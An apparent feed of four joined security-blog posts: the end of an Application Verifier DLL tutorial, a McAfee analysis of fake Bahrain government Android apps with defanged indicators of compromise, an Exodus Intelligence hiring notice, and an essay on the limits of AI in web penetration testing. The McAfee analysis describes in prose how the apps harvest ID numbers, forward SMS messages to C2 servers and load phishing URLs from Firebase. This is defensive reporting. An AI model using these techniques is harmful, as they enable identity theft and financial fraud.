AVRF: notepad.exe: pid 0xEF18: flags 0x81643027: application verifier enabled
ModLoad: 00007ffd`25b80000 00007ffd`25d24000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`963e0000 00007ffd`9640b000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`95790000 00007ffd`957b2000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`95090000 00007ffd`951a7000   C:\Windows\System32\gdi32full.dll
...
ModLoad: 00007ffd`964f0000 00007ffd`965bd000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffd`96d10000 00007ffd`96d65000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffd`965d0000 00007ffd`966e4000   C:\Windows\System32\MSCTF.dll
Opened file C:\Windows\Fonts\staticcache.dat successfully (0x0000000000000164)
ModLoad: 00007ffd`7eac0000 00007ffd`7eb6c000   C:\Windows\System32\TextShaping.dll
ModLoad: 00007ffc`ed750000 00007ffc`ed82e000   C:\Windows\System32\efswrt.dll
ModLoad: 00007ffd`90880000 00007ffd`909d7000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffd`8bf90000 00007ffd`8bfad000   C:\Windows\System32\MPR.dll
ModLoad: 00007ffd`8cae0000 00007ffd`8cce3000   C:\Windows\System32\twinapi.appcore.dll
Opened file C:\Windows\Registration\R000000000025.clb successfully (0x00000000000001C4)
ModLoad: 00007ffd`823b0000 00007ffd`82416000   C:\Windows\System32\oleacc.dll
...
Received message 0x31F for hWnd 0x00000000001F1776
Received message 0xC17C for hWnd 0x00000000001F1776
Received message 0xF for hWnd 0x00000000001F1776
Received message 0xF for hWnd 0x00000000003010C0
Received message 0xF for hWnd 0x0000000000182E7A
Received message 0x113 for hWnd 0x00000000003319A8
...
ModLoad: 00007ffd`80e20000 00007ffd`80fd4000   C:\Windows\System32\WindowsCodecs.dll
ModLoad: 00007ffd`94ee0000 00007ffd`94f04000   C:\Windows\System32\profapi.dll
Opened file C:\Users\Pavel\AppData\Local\IconCache.db successfully (0x0000000000000724)
ModLoad: 00007ffd`3e190000 00007ffd`3e1f6000   C:\Windows\System32\thumbcache.dll
Opened file C:\Users\Pavel\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db successfully (0x0000000000000450)
Opened file C:\Users\Pavel\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db successfully (0x000000000000065C)
ModLoad: 00007ffd`90280000 00007ffd`90321000   C:\Windows\SYSTEM32\policymanager.dll

This application verifier technique is an interesting one, and fairly easy to use. The full example can be found at https://github.com/zodiacon/VerifierDLL.

Happy verifying!

Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud

Authored by Dexter Shin

Many government agencies provide their services online for the convenience of their citizens. If these services are also offered through a mobile app, they become even more convenient and accessible. But what happens when malware pretends to be these services?

McAfee Mobile Research Team found InfoStealer Android malware pretending to be a government agency service in Bahrain. The malware pretends to be the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile. Users deceived by advertisements claiming these services are available on mobile will provide the personal information required for them without a second thought. The malware reaches users in various ways, including Facebook and SMS messages. Users who are not familiar with these attacks easily make the mistake of sending their personal information.

Detailed pretended app

In Bahrain, there’s a government agency called the Labour Market Regulatory Authority (LMRA). This agency operates with full financial and administrative independence under the guidance of a board of directors chaired by the Minister of Labour. It provides a variety of mobile services, and most apps provide only one service per app. However, this fake app claims to provide more than one service.

Figure 1. Legitimate official LMRA website

Figure 2. Fake app named LMRA

Beyond the most frequently found fake apps pretending to be LMRA, there are various fake apps impersonating the Bank of Bahrain and Kuwait (BBK), BenefitPay (a fintech company in Bahrain), and even apps claiming to be related to Bitcoin or loans. These apps use the same techniques as the LMRA fake apps to steal personal information.

Figure 3. Various fake apps using the same techniques

From the types of apps this malware impersonates, we can guess that the purpose is financial fraud using the stolen personal information. Moreover, someone has already been affected by this campaign, as shown in the picture below.

Figure 4. Victims of financial fraud (Source: Reddit)

Distribution method

They distribute these apps using Facebook pages and SMS messages. The Facebook pages are fake, and the malware author is constantly creating new ones. These pages direct users to phishing sites, either WordPress blog sites or custom sites designed to download apps.

Figure 5. Facebook profile and page with a link to the phishing site

Figure 6. One of the phishing sites designed to download app

In the case of SMS, social engineering messages are crafted to create a sense of urgency, tricking users into clicking a link.

Figure 7. Phishing message using SMS (Source: Reddit)

What they want

When the user launches the app, it shows a large legitimate-looking icon to mislead users, and it asks for the CPR and phone number. The CPR number is an exclusive 9-digit identifier given to each resident in Bahrain. There is a “Verify” button, but it simply sends the information to the C2 server. If users input their information, the app goes directly to the next screen without any verification; this step just stores the information for the next step.

Figure 8. The first screen (left) and next screen of a fake app (right)

There are various menus, but they are all linked to the same URL. The parameter values are the CPR and phone numbers input by the user on the first screen.

Figure 9. All menus are linked to the same URL

The last page asks for the user’s full name, email, and date of birth. After inputting everything and clicking the “Send” button, all information entered so far is sent to the malware author’s C2 server.

Figure 10. All data sent to C2 server

After sending, it shows a completion page to trick the user, with a message saying you will receive an email within 24 hours. But this is just a counter that decreases automatically; nothing happens after 24 hours. In other words, while users are waiting for the confirmation email, cybercriminals exploit the stolen information to steal the victims’ financial assets.

Figure 11. Completion page to trick users

In addition, the malware has a payload for stealing SMS. The app registers a receiver that is triggered when an SMS is received, so as soon as an SMS arrives, it forwards the message to the C2 server without notifying the user.

Figure 12. Payload for stealing SMS

Dynamic loading of phishing sites via Firebase

We confirmed that there are two types of these apps. One type implements a custom C2 server and receives data directly through a web API; the other uses Firebase. Firebase is a backend service platform provided by Google. Among its many services, Firestore can store data as a database, and this malware uses Firestore. Because it is a legitimate service provided by Google, it is difficult to detect as a malicious URL.

Apps that use Firebase dynamically load phishing URLs stored in Firestore. Therefore, even if a phishing site is blocked, the malware author can respond quickly and keep already-installed victims active by changing the URL stored in Firestore.

Figure 13. Dynamically loading phishing site loaded in webview

Conclusion

According to our detection telemetry data, 62 users have already used this app in Bahrain. However, since this is the number at the time of writing, it is expected to continue to increase, considering that new Facebook pages are still being actively created.

Recent malware tends to target specific countries or users rather than attacking indiscriminately. These attacks may be difficult for general users to recognize because the malware accurately mimics exactly what users living in a specific country need. So we recommend users install security software to protect their devices. Also, users are encouraged to download and use apps from official app stores like the Google Play Store or Apple App Store. If you can’t find an app in these stores, you should only download the app provided on the official website.

McAfee Mobile Security already detects this threat as Android/InfoStealer. For more information, visit McAfee Mobile Security.

Indicators of Compromise (IOCs)

Samples:

SHA256 Package Name App Name
6f6d86e60814ad7c86949b7b5c212b83ab0c4da65f0a105693c48d9b5798136c com.ariashirazi.instabrowser LMRA
5574c98c9df202ec7799c3feb87c374310fa49a99838e68eb43f5c08ca08392d com.npra.bahrain.five LMRA Bahrain
b7424354c356561811e6af9d8f4f4e5b0bf6dfe8ad9d57f4c4e13b6c4eaccafb com.npra.bahrain.five LMRA Bahrain
f9bdeca0e2057b0e334c849ff918bdbe49abd1056a285fed1239c9948040496a com.lmra.nine.lmranine LMRA
bf22b5dfc369758b655dda8ae5d642c205bb192bbcc3a03ce654e6977e6df730 com.stich.inches Visa Update
8c8ffc01e6466a3e02a4842053aa872119adf8d48fd9acd686213e158a8377ba com.ariashirazi.instabrowser EasyLoan
164fafa8a48575973eee3a33ee9434ea07bd48e18aa360a979cc7fb16a0da819 com.ariashirazi.instabrowser BTC Flasher
94959b8c811fdcfae7c40778811a2fcc4c84fbdb8cde483abd1af9431fc84b44 com.ariashirazi.instabrowser BenefitPay
d4d0b7660e90be081979bfbc27bbf70d182ff1accd829300255cae0cb10fe546 com.lymors.lulumoney BBK Loan App

Domains:

  • https[://]lmraa.com
  • https[://]lmjbfv.site
  • https[://]dbjiud.site
  • https[://]a.jobshuntt.com
  • https[://]shop.wecarerelief.ca

Firebase(for C2):

  • https[://]npra-5.firebaseio.com
  • https[://]lmra9-38b17.firebaseio.com
  • https[://]practice-8e048.firebaseio.com

The post Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud appeared first on McAfee Blog.

Hacking the Future: 12 Years at Exodus and the Next Big Leap

Hacking the Future: 12 Years at Exodus and the Next Big Leap

Tl;dr – We are hiring engineers, analysts, and researchers.

This May marked our 12th year of producing world-class vulnerability intelligence at Exodus Intelligence. We have had many ups (and downs) and have worked with a variety of talented people over the years whose collective contributions have made us who we are today. Throughout our history we have stayed true to our founding mission of maintaining a hacking culture, made by hackers, for hackers. We challenge and pride ourselves on researching some of the hardest targets, across a diversity of platforms and operating systems. As a team we have analyzed (I’m talking weeks-long, thorough, root cause analysis) more than 1,600 N-days, and discovered over 400 0-days in enterprise products. Whether software, hardware, server side, client side, IoT… our experts have done it all.

It has been a bit of a waiting game for the industry to build an appreciation for vulnerability intelligence, let alone zero-day vulnerability intelligence. I would argue that the industry is finally there, and with the help of a lot of the big companies, there are products that can effectively detect and defend against this category of risks.

There is still a degree of “wild west” in the industry, where it is hard to design and maintain standards for reporting, tracking, and cataloging vulnerabilities (CVE, CVSS, CNAs, CPEs, SBOM, …). At Exodus we have always focused on the core research as our wheelhouse and put less effort into the website, front end, and engineering work that drives how people view, search, and ingest our data. The market now demands it.

We are at an inflection point and aim to make our data more widely available, and to develop what tools we can to aggregate, enrich, and curate all the public data, marry it with our own discoveries and analysis, and distribute it to our customers. We have developed integrations for Splunk, Demisto (Cortex XSOAR), Slack, and Recorded Future, to name a few examples, but the engineering lift is large and the research support is substantial. Even as we jump on the GenAI bandwagon with everyone else and invest in LLMs, ML, and AI, that technology is only as good as its input data, so our researchers will need to spend the requisite time and effort training these models.

Now to the point of this post: we are hiring. We are looking for engineers with a special motivation to understand these challenges and a passion to build solutions that chip away at the problems. We intend to make some of this tooling, code, and data available to the public, so the engineers we bring onboard should have an appreciation for open source code. While we’re always looking for elite researchers to join the team, these engineering efforts will soon unlock the need for an army of analysts interested in coverage of public data an inch deep and a mile wide. We will have the incentives and mentorship in place to refine and develop skills towards hacking more difficult targets and research, but for the first time we will be opening our doors to entry-level analysts with the motivation to learn and gain unparalleled experience in the world of vulnerability research.

Current openings include:

  • Full-Stack Software Engineer
  • Web Browser Vulnerability Researcher
  • Mobile Vulnerability Researcher
  • Zero-Day Vulnerability Researcher
  • N-Day Vulnerability Researcher

Please apply at our careers page.

The post Hacking the Future: 12 Years at Exodus and the Next Big Leap appeared first on Exodus Intelligence.

Why AI Will Not Fully Replace Humans for Web Penetration Testing

Written by: Steven van der Baan

In the ever-evolving landscape of cybersecurity, the integration of artificial intelligence (AI) has revolutionized various aspects of threat detection, prevention, and mitigation. Web penetration testing, a crucial component of ensuring the security posture of digital assets, has seen significant advancements through AI-powered tools. While AI undoubtedly offers numerous benefits in this domain, it’s essential to recognize that it cannot entirely replace human expertise and intuition. In this article, we explore the reasons why AI will not fully replace humans for web penetration testing.

AI excels at handling immense data volumes and recognizing patterns. However, it typically lacks the contextual understanding that human testers possess. Web applications function within specific business contexts, and vulnerabilities may manifest differently based on factors such as industry, user behaviour, and regulatory requirements. Human testers can interpret these nuances and prioritize findings based on their potential impact on the organization’s objectives.

One of the fundamental challenges in cybersecurity is staying ahead of adversaries who continually innovate and devise new attack techniques. Although AI algorithms can detect known vulnerabilities efficiently, they may struggle to adapt to novel attack vectors or zero-day exploits. Human penetration testers bring creativity to the table, utilizing their experience and intuition to think like attackers and uncover unexpected vulnerabilities that automated tools might miss.

Certain categories of vulnerabilities, such as logical flaws or business logic errors, often require human intervention to identify accurately. These vulnerabilities may not be easily detectable through automated scanning alone, as they involve understanding the underlying logic of the application and its intended functionality. Human testers can replicate real-world scenarios and apply sophisticated techniques to uncover subtle security weaknesses that AI might overlook.

AI-powered tools for web penetration testing are prone to generating false positives (incorrectly identifying vulnerabilities that do not exist) and false negatives (overlooking actual vulnerabilities). Although advancements in machine learning have improved accuracy, eliminating both false positives and false negatives remains a significant challenge. Human testers play an essential role in validating automated findings, minimizing false alarms, and providing valuable insights into the context of each vulnerability.

The ethical and legal implications of automated penetration testing must be carefully considered. AI-powered tools may generate substantial volumes of traffic and potentially disrupt web applications, leading to unintended consequences or violations of terms of service. Furthermore, utilizing automated tools without proper authorization can result in legal repercussions. Human testers exercise judgment, ensuring that tests are conducted responsibly, with appropriate permissions and adherence to ethical guidelines.

While AI has revolutionized web penetration testing by automating routine tasks, detecting known vulnerabilities, and enhancing efficiency, it cannot replace the critical thinking, intuition, and creativity of human testers. The synergy between AI and human expertise is essential for conducting comprehensive and effective security assessments. By leveraging the strengths of both AI-powered tools and human testers, organizations can achieve a more robust and adaptive approach to web application security.
